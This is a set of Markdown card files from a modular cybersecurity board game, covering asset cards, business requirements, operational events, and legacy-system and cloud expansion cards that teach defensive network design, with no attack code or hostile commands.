| Asset | Business Function | Criticality | Server | Key Defense |
|---|---|---|---|---|
| ASSET-01 | High | SRV-01 | Email Gateway | |
| ASSET-02 | Web | Medium | SRV-02 | WAF |
| ASSET-03 | Database | Very High | SRV-03 | Network Segmentation |
| ASSET-04 | File Storage | High | SRV-04 | Network Segmentation |
| ASSET-05 | Identity | Very High | SRV-05 | Network Segmentation |
| ASSET-06 | Development | Medium | SRV-06 | Network Isolation |
| ASSET-07 | Disaster Recovery | Very High | SRV-07 | Immutable Backups |
| ASSET-08 | VPN/Remote Access | Medium | SEC-05 | MFA |
Asset Cards drive network design decisions: 1. Display all 8 Asset Cards face-up on the table 2. Team designs network to satisfy each Asset 3. For each Asset, team must include appropriate Server and Defenses 4. Team validates: "Does our network design satisfy this Asset?"
Asset Cards provide scenario context: - Threat Orchestrator refers to Assets when describing scenarios - "Customer database is being exfiltrated" = reference ASSET-03 - "Email is compromised" = reference ASSET-01 - Assets help Blue Team understand what they're protecting
Asset Cards determine impact assessment: - "How many critical systems are down?" = count "Very High" Assets affected - Recovery priority = order by Asset criticality - RTO (Recovery Time Objective) depends on which Assets must recover first
Financial Services Assets: - Trading System (real-time market data) - Payment Processing (external integrations) - Audit Trail (regulatory requirement)
Healthcare Assets: - Electronic Health Records (HIPAA-critical) - Prescription Management (pharmacy integration) - Patient Portal (external access)
Manufacturing Assets: - Industrial Control Systems (safety-critical) - Supply Chain Integration (vendor systems) - Engineering Data (intellectual property)
Retail Assets: - Point of Sale (transaction processing) - Inventory Management (supplier integration) - Customer Loyalty (marketing data)
After team completes network design, verify each Asset is satisfied. The checklist only names components that can actually be purchased from the Network Building decks; items in parentheses are recommended, not mandatory.
If any Asset is unsatisfied or under-defended: - Network design is incomplete - That Asset becomes a vulnerability in Incident Response - That Asset affects recovery time in Disaster Recovery
Network Building Module: Asset Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/standalone/business-requirement-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Business Requirement Cards drive the Network Building standalone game. One card is revealed at the start of each turn (Phase 1) and represents what the business demands this quarter. Teams must satisfy the requirement by end of the stated deadline or take the score penalty.
Type: Growth Requirement: Marketing is launching a flagship product this quarter and needs a modern public website. Satisfied By: Web Server (7), OR web service hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (launch flops; lost sales)
Type: Growth / M&A Requirement: The executive team is acquiring a customer-data company. Two million customer records must land somewhere safe by end of quarter. Satisfied By: Database Server (10), OR database service hosted on a Cloud Workload (4) — cloud-hosting the crown jewels is a recorded risk Score Impact: Missed: -10 points (deal falls through)
Type: Workforce Requirement: HR is rolling out flexible work. Staff need secure remote access to internal systems. Satisfied By: VPN Gateway (9) Score Impact: Missed: -3 points (staff use risky workarounds; morale dips)
Type: Workforce Requirement: The board mandates support for a fully remote workforce: secure access AND central identity for every remote login. Satisfied By: VPN Gateway (9) AND Domain Controller (12) Score Impact: Missed: -5 points (shadow IT spreads across home offices)
Type: Compliance Requirement: A new healthcare client puts you in HIPAA scope. Regulators expect recoverable data and isolated sensitive systems. Satisfied By: Backup Server (9) AND network segmentation (Network Segmentation Switch (10), or Segmented/Fully Isolated architecture) Score Impact: Missed: -10 points (client walks; compliance exposure)
Type: Compliance Requirement: You now process card payments. Cardholder data must live on a database that is walled off from the rest of the network. Satisfied By: Database Server (10) or cloud-hosted database, AND a Firewall (12) or Network Segmentation Switch (10) protecting it Score Impact: Missed: -10 points (acquirer threatens to pull card processing)
Type: Operations Requirement: Your biggest customer signs a contract with a 99.9% uptime SLA on your public services. A single box is no longer good enough. Satisfied By: Load Balancer (8), OR a second server duplicating any business-critical service (full price) Score Impact: Missed: -5 points (SLA credits eat the margin)
Type: Growth / M&A Requirement: The company you just bought needs its two core services absorbed into your infrastructure this quarter. Satisfied By: Two free capacity slots across your existing servers, OR deploy any new server this turn to host them (overloading is allowed at +1 Budget per extra service) Score Impact: Missed: -10 points (integration stalls; synergies evaporate)
Type: Operations Requirement: Headcount doubled and the email system is groaning. Add headroom. Satisfied By: Second Email Server (8), Load Balancer (8), OR email hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (mail delays; missed customer requests)
Type: Compliance Requirement: The audit committee orders an independent security audit. Auditors expect centralized visibility of security events. Satisfied By: SIEM (15), OR both IDS (10) and Email Gateway (6) Score Impact: Missed: -5 points (qualified audit opinion)
Type: Security Requirement: A competitor's breach is front-page news. The board demands demonstrable incident-detection capability. Satisfied By: IDS (10), IPS (14), OR SIEM (15) Score Impact: Missed: -10 points (board censure; CISO on thin ice)
Type: Security Requirement: A ransomware variant is tearing through your industry. You need recoverable backups AND a way to spot the attack. Satisfied By: Backup Server (9) AND at least one of IDS (10) / IPS (14) / SIEM (15) Score Impact: Missed: -20 points (you are one bad click from catastrophe)
Type: Growth Requirement: A new regional office opens with no local infrastructure. Staff there must reach head-office systems securely. Satisfied By: VPN Gateway (9) Score Impact: Missed: -5 points (office runs on personal email and USB sticks)
Type: Growth Requirement: Sales moves online. You need a public web presence AND protection against the web attacks that come with taking payments. Satisfied By: Web Server (7) or cloud-hosted web, AND WAF (11) Score Impact: Missed: -5 points (checkout is either absent or a breach waiting to happen)
Type: Workforce Requirement: Engineering triples in size. Developers need somewhere to build and test that is not production. Satisfied By: Development Server (5), OR dev services overloaded onto an existing server (+1 Budget per extra service — allowed) Score Impact: Missed: -3 points (developers test in production; incidents follow)
Type: Compliance Requirement: New regulation requires seven-year retention of business records: durable shared storage plus a recoverable copy. Satisfied By: File storage (File Server (6), or hosted on another server's capacity/overload) AND Backup Server (9) Score Impact: Missed: -5 points (regulator issues a compliance notice)
Type: Operations Requirement: Password chaos across a dozen apps. Leadership wants one identity for everything. Satisfied By: Domain Controller (12) Score Impact: Missed: -5 points (password reuse everywhere; helpdesk drowning)
Type: Security Requirement: Your insurer's renewal questionnaire wants proof of backups, phishing defense, and detection. Satisfied By: Backup Server (9) AND Email Gateway (6) AND at least one of IDS/IPS/SIEM Score Impact: Met: +5 points (premium drops). Missed: -5 points (premium spikes)
Type: Security (Opportunity) Requirement: Your ISAC offers to feature any member running deception technology in its quarterly report. Satisfied By: Honeypot Decoy (7) or Honeypot Network (8) Score Impact: Met: +5 points (industry kudos). Missed: 0 points (opportunity passes; no penalty)
Type: Operations (Opportunity) Requirement: Finance wants the server-room footprint shrunk. Show that at least one business service runs in the cloud. Satisfied By: Any service hosted on a Cloud Workload (4) Score Impact: Met: +3 points (opex savings). Missed: -3 points (facilities costs balloon)
| Card | Requirement | Satisfied By | Missed | Met Bonus |
|---|---|---|---|---|
| REQ-01 | Product Launch Website | Web Server or cloud web | -5 | — |
| REQ-02 | Customer Data Acquisition | Database (dedicated or cloud) | -10 | — |
| REQ-03 | Work-From-Home Program | VPN Gateway | -3 | — |
| REQ-04 | Remote Workforce Mandate | VPN Gateway + Domain Controller | -5 | — |
| REQ-05 | HIPAA Compliance | Backup + segmentation | -10 | — |
| REQ-06 | PCI Cardholder Data | Database + Firewall/Segmentation | -10 | — |
| REQ-07 | 99.9% Uptime SLA | Load Balancer or duplicate server | -5 | — |
| REQ-08 | M&A Network Integration | 2 spare slots or new server | -10 | — |
| REQ-09 | Scale Email System | 2nd Email Server / LB / cloud email | -5 | — |
| REQ-10 | Security Audit | SIEM, or IDS + Email Gateway | -5 | — |
| REQ-11 | IR Readiness | IDS, IPS, or SIEM | -10 | — |
| REQ-12 | Ransomware Wave | Backup + detection | -20 | — |
| REQ-13 | New Subsidiary Office | VPN Gateway | -5 | — |
| REQ-14 | E-Commerce Expansion | Web + WAF | -5 | — |
| REQ-15 | Developer Hiring Spree | Dev Server or overload | -3 | — |
| REQ-16 | Records Retention | File storage + Backup | -5 | — |
| REQ-17 | Single Sign-On | Domain Controller | -5 | — |
| REQ-18 | Cyber-Insurance Renewal | Backup + Email Gateway + detection | -5 | +5 |
| REQ-19 | Threat-Intel Pilot | Honeypot | 0 | +5 |
| REQ-20 | Data-Center Consolidation | Any cloud-hosted service | -3 | +3 |
Requirements are deliberately lumpy: some are satisfied by things every sane design already has (web, database), others punish narrow builds (detection, deception, redundancy). Teams that spend everything in turn 1 have no reserve when REQ-12 lands.
Network Building Standalone: Business Requirement Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/standalone/operational-event-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Operational Event Cards are the random incidents, windfalls, and headaches of running infrastructure. One card is revealed each turn (Phase 2) of the Network Building standalone game, right after the Business Requirement.
Type: Outage Effect: Your email server dies mid-quarter. Choose one: - Repair: Pay 5 Budget (emergency callout) - Ignore: -10 points (email down all quarter; users furious) Mitigated By: A second Email Server, or email hosted on a Cloud Workload — the redundant/cloud service carries the load: no cost, no penalty No email service at all? Nothing to break — but you already have bigger problems (see Capability scoring)
Type: Load Effect: Your product goes viral overnight. Public services are hammered. - Prepared (Load Balancer, CDN, or a duplicated web service): +5 points (you rode the wave; sales boom) - Unprepared: -5 points (site down during your biggest day) Mitigated By: Load Balancer (8), CDN (expansion CLOUD-04), or redundant web hosting
Type: Attack Effect: A targeted phishing campaign hits every inbox in the company. - Email Gateway deployed: +5 points (campaign filtered; nice catch) - No Email Gateway: -10 points (three credential sets stolen) Mitigated By: Email Gateway (6)
Type: Outage Effect: Your cloud provider has a region-wide outage this quarter. - If any required business service runs only in the cloud: -5 points (service dark; SLA breached) - Cloud services with an on-prem twin, or no cloud usage: no effect Mitigated By: On-prem redundancy for cloud-hosted services, or an all-on-prem design Lesson: Cloud is cheap, but concentration risk is real
Type: Finance Effect: Fiscal crisis. Lose 5 Budget immediately (to a minimum of 0). Mitigated By: Nothing — but teams holding a contingency reserve absorb it without changing plans
Type: Finance Effect: A surprise rebate lands. Gain +10 Budget (one time). Mitigated By: N/A (enjoy it)
Type: Finance Effect: A government cyber-resilience grant is available to organizations with recoverable backups. - Backup Server deployed: Gain +5 Budget - No Backup Server: Nothing (you don't qualify) Mitigated By: N/A — this one rewards good hygiene
Type: Capacity Effect: Shared storage hits 98% full. Choose one this turn: - Add capacity: Deploy any server to host file storage, or overload an existing server (+1 Budget per extra service) - Ignore: -5 points (service degradation; work grinds) Mitigated By: Spare capacity anywhere in your design (assign file storage to it at no cost) No file storage service at all? No effect — and no file-storage capability either
Type: Attack (Detected?) Effect: Someone has been quietly probing your network. - Honeypot Decoy or Honeypot Network deployed: +5 points (intruder caught red-handed in the decoy; access cut) - No honeypot: Nothing visible happens. Nothing visible ever happens. (No penalty — this time) Mitigated By: N/A — this is deception's payday
Type: Attack Effect: An employee is browsing systems far outside their role. - SIEM deployed OR network segmentation in place: +5 points (caught early / blocked at the zone boundary) - Neither: -5 points (months of quiet data access before anyone notices) Mitigated By: SIEM (15) or Network Segmentation Switch (10) / segmented architecture
Type: Attack (Severe) Effect: Ransomware detonates on an internal system. - Backup Server deployed: Pay 3 Budget for restore effort; if you also have detection (IDS/IPS/SIEM), you contained it fast: +5 points - No Backup Server: -20 points (pay the ransom or lose the data — either way it's ugly) Mitigated By: Backup Server (9); detection reduces blast radius
Type: Operations Effect: The ops team is running on fumes. This turn you may deploy at most ONE component. (Handling the turn's Business Requirement with an already-deployed component is fine.) Mitigated By: Designs that are already complete — teams who front-loaded their build barely notice
Type: Opportunity Effect: A security vendor is clearing stock. The next security device you deploy this turn costs 2 less (minimum cost 1). Mitigated By: N/A — pure opportunity; skip it if nothing on the list fits your design
Type: Workforce Effect: A key new hire works from another city and starts Monday. - VPN Gateway deployed: No effect (onboarding is routine) - No VPN Gateway: -3 points (they quit in week two, or worse: they improvise) Mitigated By: VPN Gateway (9)
Type: Outage Effect: A vendor recalls a faulty component. Pick one of your on-prem servers (Threat Orchestrator picks if you won't): - Pay 3 Budget for expedited replacement, OR - That server is offline this quarter — any requirement it alone satisfies counts as unmet this turn Mitigated By: Redundant servers or cloud-hosted twins (the twin covers the outage: no cost, no penalty). All-cloud designs are unaffected
Type: Respite Effect: Nothing breaks. Nobody attacks. Finance leaves you alone. Use the breathing room to review your gaps. Mitigated By: N/A
| Card | Event | Effect (Unmitigated) | Mitigated By |
|---|---|---|---|
| EVT-01 | Email Server Failure | Pay 5 or -10 pts | Redundant/cloud email |
| EVT-02 | Traffic Spike | -5 pts (or +5 if ready) | LB / CDN / redundant web |
| EVT-03 | Phishing Wave | -10 pts (or +5 if ready) | Email Gateway |
| EVT-04 | Cloud Vendor Outage | -5 pts if cloud-only service | On-prem redundancy |
| EVT-05 | Budget Cut | -5 Budget | Contingency reserve |
| EVT-06 | Emergency Funds | +10 Budget | — |
| EVT-07 | Security Grant | +5 Budget if Backup | — |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts | Spare capacity |
| EVT-09 | Honeypot Triggers | +5 pts if honeypot | — |
| EVT-10 | Insider Snooping | -5 pts (or +5 if ready) | SIEM / segmentation |
| EVT-11 | Ransomware Strikes | -20 pts | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout | Max 1 deploy this turn | Completed builds |
| EVT-13 | Vendor Promotion | Next device -2 cost | — |
| EVT-14 | New Hire Remote Access | -3 pts | VPN Gateway |
| EVT-15 | Hardware Recall | Pay 3 or server offline | Redundancy / cloud |
| EVT-16 | Quiet Quarter | Nothing | — |
Events reward the same things the scoring rewards — redundancy, detection, backups, and a contingency reserve — so mitigation is never wasted spend. The nastiest cards (EVT-11) are exactly why hoarding zero-reserve builds and backup-free builds both hurt.
Network Building Standalone: Operational Event Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/expansion-deck/legacy-systems.md
Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025
Legacy System Cards extend the Network Building module with specialized systems that many organizations still operate but cannot easily patch or upgrade.
Type: Legacy Business-Critical Infrastructure Cost: 15 Budget (expensive to operate) Complexity: 4/4 (extremely complex, specialized expertise required) Availability Requirement: 99.95% (financial/mission-critical) Supported Operating System: Mainframe OS (z/OS, VSE, VM), Not patchable
Description: Large centralized mainframe computer running business-critical applications. Banks, insurance companies, government agencies, and utilities often depend on mainframes for core operations. Mainframes are designed for availability and stability, but security model is outdated (predates internet security concerns).
Key Characteristics: - Age: Often 20-30+ years old - Software: Custom applications written in COBOL or other legacy languages - Security: Perimeter security model (assume all internal traffic is trusted) - Expertise: Few experts remain (knowledge leaving the industry) - Vendor Support: Vendor may no longer exist; in-house expertise critical - Cost of Replacement: $5M-100M+ (impossible to replace)
Key Concerns: - No regular security patches available (vendor EOL) - Known CVEs published but cannot be patched - Legacy protocols (unencrypted connections, weak authentication) - Access control systems predate modern security standards - Directly connected to corporate network (not isolated) - Often contains entire organization's critical data - Business process depends on it (replacement would take years)
Defense Strategy (Cannot Fix, Must Isolate): - Network Isolation: Mainframe in restricted segment, minimal connectivity - Firewall Rules: Only authorized systems can connect to specific ports - Monitoring: SIEM must monitor all mainframe connections (detect anomalies) - Assumption of Breach: Assume mainframe will be compromised; defend everything else - No Direct User Access: Users should not directly access mainframe (access via secure application tier) - Log Aggregation: All mainframe activities logged centrally (immutable audit trail)
Network Interactions: - Requires: Firewall rules isolating mainframe - Requires: Network Segmentation to restrict access - Requires: SIEM monitoring for anomaly detection - Incompatible with: Direct internet access (perimeter firewall only) - Incompatible with: Cloud integration (data residency and connectivity issues)
Incident Response Impact: - If mainframe is compromised, entire organization may be compromised - Mainframe compromise may be immediate game-loss in Incident Response - Legacy authentication means attacker can move freely once inside - Mainframe contains sufficient data to be primary exfiltration target
Team Design Validation: - ✓ If including mainframe: must include Network Segmentation + Firewall - ✓ Must include SIEM for monitoring - ✗ Failure: Direct user access to mainframe increases risk - ✗ Failure: Cloud connectivity to mainframe violates security boundary
Type: Legacy Business-Critical Software Cost: 8 Budget (application licensing/support) Complexity: 3/4 (difficult to update or replace) Availability Requirement: 99% (business depends on it) Operating System: Windows Server 2008/2012, or older Linux, or proprietary OS
Description: Specialized business application written by external vendor or in-house team that is no longer maintained. Application may be: - Accounting system (custom financial software) - Manufacturing control system (production scheduling) - Insurance claims system - Legal case management system - ERP (Enterprise Resource Planning) system
The application is mission-critical but: - Vendor no longer provides updates (company went out of business, or stopped supporting) - Cost to replace: $500K-$5M+ (economically infeasible) - Business process deeply embedded in application (replacement would require major restructuring) - Knowledge of application is scarce (original developers left, documentation poor)
Key Characteristics: - Age: Often 10-20 years old - Language: Written in outdated languages (Visual Basic 6, old Java, COBOL) - Vendor: Vendor may no longer exist; purchased "as-is" - Customization: Heavily customized for organization (not standard product) - Expertise: Few people understand the code - Database: Proprietary or very old database (SQL Server 2005, Oracle 10g, etc.) - Integration: Deeply integrated into business workflow
Key Concerns: - Application may contain hardcoded credentials - Application may store passwords in plaintext - Application may use unencrypted connections to database - Application may have SQL injection vulnerabilities (pre-2005 development) - Application may lack audit logging - Upgrading operating system may break application - Patches to operating system may be incompatible with application - Security testing tools may break application
Defense Strategy (Isolate and Monitor): - Application Server Isolation: Application in restricted segment - Database Isolation: Application database encrypted and access-controlled - Network Firewall: Only users/systems needing application can access it - No Direct Internet Access: Application never exposed to internet - SIEM Monitoring: All application access logged and monitored - Assumption: Assume application has SQL injection or similar vulnerabilities; defend database - Access Control: Limit who can use application (risk vs. benefit analysis)
Network Interactions: - Requires: Application Server (SRV-06 or custom server) - Requires: Database Server isolated from other systems - Requires: Firewall rules limiting access - Requires: SIEM monitoring application access - Incompatible with: Cloud hosting (licensing, data residency issues)
Incident Response Impact: - Custom application vulnerability could be exploited for lateral movement - Application database compromise exposes sensitive business data - Application logs may be missing or inaccessible - Attacker may extract application source code
Team Design Validation: - ✓ If including custom application: must isolate application + database - ✓ Must limit user access (principle of least privilege) - ✓ Must monitor application access in SIEM - ✗ Failure: Direct internet access to application increases attack surface - ✗ Failure: Weak access controls allow unauthorized application access
Type: Operational Technology (OT) / Safety-Critical Cost: 12 Budget (specialized equipment) Complexity: 4/4 (extremely specialized, safety implications) Availability Requirement: 99.9%+ (safety-critical, cannot fail) Operating System: Proprietary Industrial OS, real-time OS, or very old Linux
Description: Specialized system that controls physical machinery, manufacturing processes, power generation, utilities, or other critical infrastructure. Examples: - Manufacturing: Assembly line control, robotic systems - Utilities: Power distribution, water treatment, smart grid - Building Systems: HVAC, access control, fire systems - Transportation: Traffic signals, rail systems
Industrial Control Systems (ICS) are purpose-built for reliability and real-time control, not information security. They predate cybersecurity concerns.
Key Characteristics: - Purpose: Controls physical machinery or critical infrastructure - Real-time: Must respond in milliseconds (cannot tolerate latency) - Reliability: Designed for 99.99%+ availability - Security: Predates modern security (no authentication, no encryption) - Isolation: Historically air-gapped (not connected to corporate network) - Expertise: Requires specialized engineering expertise (electrical, mechanical, control systems) - Cost of Downtime: $10K-$1M+ per minute of downtime - Lifecycle: 10-30 year lifespan (different than IT systems)
Key Concerns (from IT Perspective): - Cannot be patched (real-time systems cannot tolerate OS updates) - Cannot tolerate intrusion detection (latency would affect operations) - Cannot install EDR/antivirus (would slow down real-time responses) - Cannot use modern encryption (adds latency) - Uses legacy protocols (Modbus, Profibus, DNP3 - no security built-in) - Often air-gapped; now being connected to corporate network (exposes vulnerability) - If compromised, physical safety implications (machinery malfunction, power outage, etc.)
Key Concerns (from ICS Perspective): - Availability is paramount (security is secondary) - Adding security controls might affect uptime - ICS engineers don't understand IT security - IT security tools and practices may break ICS - ICS changes must be tested extensively (downtime is unacceptable)
Defense Strategy (Strict Isolation): - Never Connect to Corporate Network: ICS should remain air-gapped - If Connection Required: Use unidirectional gateway (ICS can send data out, nothing comes in) - Network Segmentation: ICS in completely isolated segment from corporate systems - No User Internet Access from ICS: ICS workstations cannot browse internet - Physical Security: ICS room locked, access restricted to authorized engineers - Monitoring: Use ICS-specific monitoring tools (not traditional SIEM) - Assumption: Assume ICS network will be compromised; focus on preventing spread to corporate
Network Interactions: - Isolation: Complete separation from corporate network (air-gapped preferred) - If Bridge Required: Unidirectional gateway (one-way data flow) - Incompatible with: Corporate firewall (ICS cannot tolerate intrusion detection latency) - Incompatible with: EDR/Antivirus (would slow down real-time control) - Incompatible with: Cloud integration (real-time latency requirements)
Incident Response Impact: - ICS compromise may cause physical safety issues (priority = physical safety over data) - ICS compromise may cause production shutdown (significant financial impact) - ICS security investigation requires specialized expertise (not standard IT) - ICS forensics may disrupt operations (cannot preserve evidence if it affects safety)
Team Design Validation: - ✓ If including ICS: must isolate ICS from corporate network - ✓ Must use unidirectional gateway if connectivity required - ✓ Must NOT install traditional IT security tools on ICS - ✗ Failure: Corporate network connected to ICS without isolation - ✗ Failure: ICS exposed to internet or untrusted networks - ✗ Failure: IT security tools degrading ICS real-time performance
Type: Legacy Infrastructure Running Unsupported OS Cost: 5 Budget (cheap hardware, but difficult to support) Complexity: 3/4 (difficult to manage with modern security tools) Availability Requirement: 80-95% (business can tolerate occasional downtime) Operating System Examples: Windows XP, Windows Server 2003, old Linux kernels, custom UNIX variants
Description: Systems running operating systems that are no longer supported by vendor or open-source community. Vendor has stopped releasing security patches. Public exploit code for known vulnerabilities exists and is freely available.
Examples: - Windows XP (support ended 2014) - Windows Server 2003 (support ended 2015) - Linux 2.4/2.6 kernels (EOL for 10+ years) - Solaris 8/9 (Sun Microsystems EOL) - Other commercial UNIX variants EOL decades ago
Key Characteristics: - Support: No security patches from vendor - Exploits: All known vulnerabilities are published (no zero-days) - Tools: Modern security tools often don't run on EOL OS - Compatibility: Cannot run modern applications - Patching OS: OS upgrade would break dependent applications - Cost of Replacement: Application replacement cost makes OS upgrade prohibitive
Key Concerns: - All known vulnerabilities can be exploited (no patches) - Public exploits readily available (trivial for attacker) - Modern malware often targets these systems (profitable attacks) - Ransomware frequently targets EOL systems (known vulnerabilities) - System cannot run modern antivirus/EDR (not compatible) - System cannot use modern encryption protocols - System is prone to exploitation for lateral movement into modern systems
Defense Strategy (Assume Compromise, Isolate): - Assumption: Assume EOL system will be compromised (all vulnerabilities are public) - Network Isolation: EOL system in restricted segment, minimal connectivity - Firewall Rules: Only necessary traffic to/from EOL system - No Lateral Movement: Firewall rules prevent movement from EOL system to others - No Sensitive Data: Do not store sensitive data on EOL system - Monitoring: SIEM monitors EOL system closely (detect compromise signs) - Replacement Planning: Have timeline to replace/upgrade EOL system - Physical Security: Restrict physical access to EOL system
Network Interactions: - Isolation: EOL system in isolated segment - Firewall: Strict firewall rules (default deny) - Monitoring: SIEM alerts on any unusual EOL system activity - No Cloud Access: EOL system does not connect to cloud systems - Air-gapped Preferred: If possible, keep EOL system air-gapped
Incident Response Impact: - EOL system compromise may be inevitable (all vulnerabilities public) - Attacker will target EOL system as entry point (easier than hardened systems) - EOL system may be used as staging point for attacks on hardened systems - Forensics on EOL system may be difficult (no modern forensics tools support it)
Team Design Validation: - ✓ If including EOL system: must isolate completely - ✓ Must have replacement timeline - ✓ Must NOT store sensitive data on EOL system - ✗ Failure: No network isolation for EOL system - ✗ Failure: Sensitive data on EOL system - ✗ Failure: EOL system has same network privileges as modern systems
| Card | System Type | Cost | Complexity | Key Challenge |
|---|---|---|---|---|
| LEGACY-01 | Mainframe | 15 | 4/4 | Cannot patch, mission-critical |
| LEGACY-02 | Custom Application | 8 | 3/4 | Vendor no longer exists |
| LEGACY-03 | Industrial Control | 12 | 4/4 | Real-time + safety-critical |
| LEGACY-04 | Obsolete OS | 5 | 3/4 | All vulnerabilities public |
Key Principle: Cannot Fix, Must Isolate
Legacy systems cannot be fixed through normal security controls: - Cannot patch (vendor no longer supports) - Cannot upgrade OS (breaks dependent applications) - Cannot install modern security tools (incompatible) - Cannot redesign (cost prohibitive)
Instead, organizations must: 1. Isolate the legacy system: Separate network segment, strict firewall rules 2. Monitor closely: SIEM alerts on any anomalous activity 3. Assume compromise: Design defenses assuming legacy system will be compromised 4. Plan replacement: Have timeline to eventually replace legacy system 5. Limit exposure: Do not connect sensitive systems to legacy system network
Including legacy systems significantly increases network design complexity: - Must add firewall rules for each legacy system - Must add network segmentation - Must add SIEM monitoring - Budget is constrained (legacy systems are expensive to operate)
If Incident Response follows Network Building: - Legacy systems are easier attack targets (known vulnerabilities) - Attacker will likely compromise legacy system first - Legacy system compromise may lead to lateral movement - Legacy system may lack proper logging (forensics is difficult)
Teams face strategic decision: Include legacy systems or avoid them? - Include Legacy Systems: Realistic, mirrors real organizations, adds challenge - Avoid Legacy Systems: Simpler network design, but unrealistic - Team Decision: Should reflect organization's actual legacy system situation
Additional Legacy System Cards: - LEGACY-05: Mainframe Tape Backup System (disaster recovery, retention archiving) - LEGACY-06: Proprietary Database System (custom data storage, vendor extinct) - LEGACY-07: Dedicated PBX Telephony System (VoIP not yet viable) - LEGACY-08: Custom SCADA System (industrial automation, not standard ICS)
Network Building Module: Legacy Systems (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition
cards/network-building/expansion-deck/cloud-variants.md
Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025
Cloud Variant Cards extend the Network Building module with advanced cloud deployment options and cloud-native technologies beyond the basic Cloud Workload card in the core deck.
Type: Cloud-Native Architecture Cost: 6 Budget (container orchestration platform) Complexity: 3/4 (requires Kubernetes expertise) Supported Platforms: AWS ECS, Azure Container Instances, Google Cloud Run, Kubernetes Application Type: Modern cloud-native applications built as multiple small services
Description: Applications broken into microservices running in containers (Docker). Each service is a separate container that can scale independently. Containers are orchestrated by a platform (Kubernetes, Docker Swarm, ECS).
Key Characteristics: - Services: Application broken into small, focused services - Containers: Each service runs in a container (isolated environment) - Orchestration: Platform automatically manages container deployment, scaling, and recovery - Scalability: Each service can scale independently based on demand - DevOps: Infrastructure and code are tightly integrated (Infrastructure as Code) - Cloud-Native: Built for cloud (ephemeral resources, auto-scaling, auto-healing)
Key Advantages: - Scalability: Auto-scale individual services based on load - Resilience: Container failure doesn't affect entire application - Efficiency: Containers share OS kernel (more efficient than VMs) - Velocity: Deploy microservices independently (faster development) - Cost: Pay only for resources used (serverless principles)
Key Concerns (Security Perspective): - Complexity: Many moving parts, many potential attack surfaces - Container Escape: Attacker in one container might escape to host - Supply Chain: Container images come from registries (may be compromised) - Secrets Management: Container needs credentials/API keys (risk of exposure) - Lateral Movement: Multiple containers in same cluster, network policies must isolate - Compliance: Tracing data across microservices complicated - Logging: Distributed across many containers (aggregation required)
Defense Strategy: - Container Runtime Security: Monitor and restrict container behavior (Falco, Sysdig) - Image Scanning: Scan images for vulnerabilities before deployment - Network Policies: Kubernetes network policies restrict inter-service communication - Pod Security Policies: Restrict what containers can do (no privileged escalation) - Registry Security: Scan images in registry, require signing - Secrets Vault: Use HashiCorp Vault or cloud native secrets (not environment variables) - SIEM Integration: Aggregate logs from all containers
Network Interactions: - Works with: Cloud-native architecture (ARCH-05) - Requires: Container orchestration platform (Kubernetes) - Requires: Container registry (Docker Hub, ECR, ACR, GCR) - Requires: Secrets management (HashiCorp Vault, AWS Secrets Manager) - Integrates with: Microservices architecture (multiple services)
Incident Response Impact: - Container compromise may be isolated (if network policies work) - Container escape would give attacker access to host - Supply chain attack on container images affects all deployments - Distributed nature makes forensics complex - Log aggregation essential for investigation
Team Design Validation: - ✓ If including microservices: must include container runtime security - ✓ Must include image scanning + signing - ✓ Must include network policies - ✓ Must include secrets management - ✗ Failure: Hardcoded secrets in containers - ✗ Failure: No image signing/scanning - ✗ Failure: No container network policies
Type: Cloud-Native Compute (Abstracted Infrastructure) Cost: 3 Budget (minimal infrastructure management) Complexity: 2/4 (simple from ops perspective, but different security model) Supported Platforms: AWS Lambda, Azure Functions, Google Cloud Functions, IBM Cloud Functions Use Cases: Event-driven processing, API backends, scheduled jobs, data transformation
Description: Functions deployed to serverless platform. You write code, platform handles scaling, infrastructure, and execution. You pay only for actual execution time (milliseconds).
Key Characteristics: - No Infrastructure: You don't manage servers/containers/VMs - Event-Driven: Functions triggered by events (API call, message queue, schedule, etc.) - Auto-Scaling: Automatically scales from zero to thousands of concurrent executions - Stateless: Functions should not maintain state (state in database/message queue) - Time-Limited: Function has timeout (usually 15 minutes max) - Cost Model: Pay per execution millisecond (very cheap if infrequently called)
Key Advantages: - Simplicity: Write code, deploy, done (no servers to manage) - Cost: Pay only for execution time (not for idle servers) - Scalability: Automatic scaling without configuration - Velocity: Rapid deployment cycle (seconds) - Reduced Attack Surface: No server to compromise (provider manages infrastructure)
Key Concerns (Security Perspective): - Dependency Management: Function depends on libraries (vulnerable packages) - Secrets in Environment Variables: Function needs credentials (hardcoded or env vars) - Supply Chain: Libraries may be compromised (dependency attack) - Monitoring Blind Spot: Functions are ephemeral (logs must be aggregated) - Cold Start Attacks: Function startup time can leak information - Privilege Escalation: Function may have overly broad IAM permissions - Denial of Service: Function can be invoked repeatedly (cost/resource attack) - Compliance: Difficult to audit function execution (multi-tenant platform)
Defense Strategy: - Dependency Scanning: Scan dependencies for vulnerabilities - Secrets Management: Use cloud secrets manager (not environment variables) - IAM Least Privilege: Function has minimum required permissions - CloudTrail Logging: Log all function invocations - VPC Integration: Function connects to VPC if accessing private resources - Rate Limiting: Prevent function invocation DoS - Input Validation: Strict validation of all inputs (injection attacks) - Library Pinning: Pin exact library versions (prevent supply chain attacks)
Network Interactions: - Works with: Cloud-first architecture (ARCH-05) - Integrates with: API Gateway (exposes function as HTTP endpoint) - Integrates with: Message Queues (event-driven triggers) - Requires: Secrets Manager (for credentials) - Optional: VPC integration for private resource access
Incident Response Impact: - Function compromise is possible (code vulnerability or dependency) - Function invocation logs are critical (only audit trail) - Multi-tenant platform may complicate forensics - Dependency vulnerability affects all functions using vulnerable library - Distributed nature makes understanding attack chain difficult
Team Design Validation: - ✓ If including serverless: must include secrets management - ✓ Must include dependency scanning - ✓ Must include IAM least privilege configuration - ✗ Failure: Secrets in environment variables - ✗ Failure: Overly broad function permissions - ✗ Failure: No input validation
